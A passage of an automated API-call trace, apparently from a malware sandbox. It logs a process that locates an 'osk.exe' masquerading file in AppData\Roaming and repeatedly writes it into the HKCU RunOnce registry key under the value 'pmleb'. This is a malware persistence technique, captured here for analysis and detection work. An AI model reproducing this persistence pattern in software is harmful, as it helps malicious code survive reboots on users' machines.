0x80004002 [0080.331] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.331] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.331] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.331] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.331] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x73 [0080.331] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.331] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x74 [0080.331] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.332] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x73 [0080.332] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.332] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.333] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.333] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.333] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.333] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.333] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.333] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.333] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.333] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.333] RegCloseKey (hKey=0x280) returned 0x0 [0080.334] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.334] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.334] SetTimer (hWnd=0x20280, nIDEvent=0x2073, uElapse=0xa, lpTimerFunc=0x0) returned 0x2073 [0080.334] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.345] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.345] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.346] KillTimer (hWnd=0x20280, uIDEvent=0x2073) returned 1 [0080.346] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.346] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0080.346] IUnknown:Release (This=0x787518) returned 0x1 [0080.346] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.346] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.346] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.347] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.347] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.347] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 
Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.347] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.347] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.347] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.347] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x74 [0080.347] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.347] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x75 [0080.347] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.348] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x74 [0080.348] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.348] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.348] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.348] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.348] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.348] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.349] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.349] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.349] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.349] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.349] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.349] RegCloseKey (hKey=0x280) returned 0x0 [0080.349] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.349] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.349] SetTimer (hWnd=0x20280, nIDEvent=0x2074, uElapse=0xa, lpTimerFunc=0x0) returned 0x2074 [0080.349] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.361] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.361] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.361] KillTimer (hWnd=0x20280, uIDEvent=0x2074) returned 1 [0080.361] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.361] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.362] IUnknown:Release (This=0x787518) returned 0x1 [0080.362] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.362] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.362] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.362] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.362] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x75 [0080.363] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.363] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x76 [0080.363] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.364] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x75 [0080.364] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.364] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.364] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.364] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.364] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.364] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.364] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.364] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.365] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.365] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.365] RegCloseKey (hKey=0x280) returned 0x0 [0080.365] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.365] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.365] SetTimer (hWnd=0x20280, nIDEvent=0x2075, uElapse=0xa, lpTimerFunc=0x0) returned 0x2075 [0080.365] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.377] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.377] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.377] KillTimer (hWnd=0x20280, uIDEvent=0x2075) returned 1 [0080.378] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.378] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.378] IUnknown:Release (This=0x787518) returned 0x1 [0080.378] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.378] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.378] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 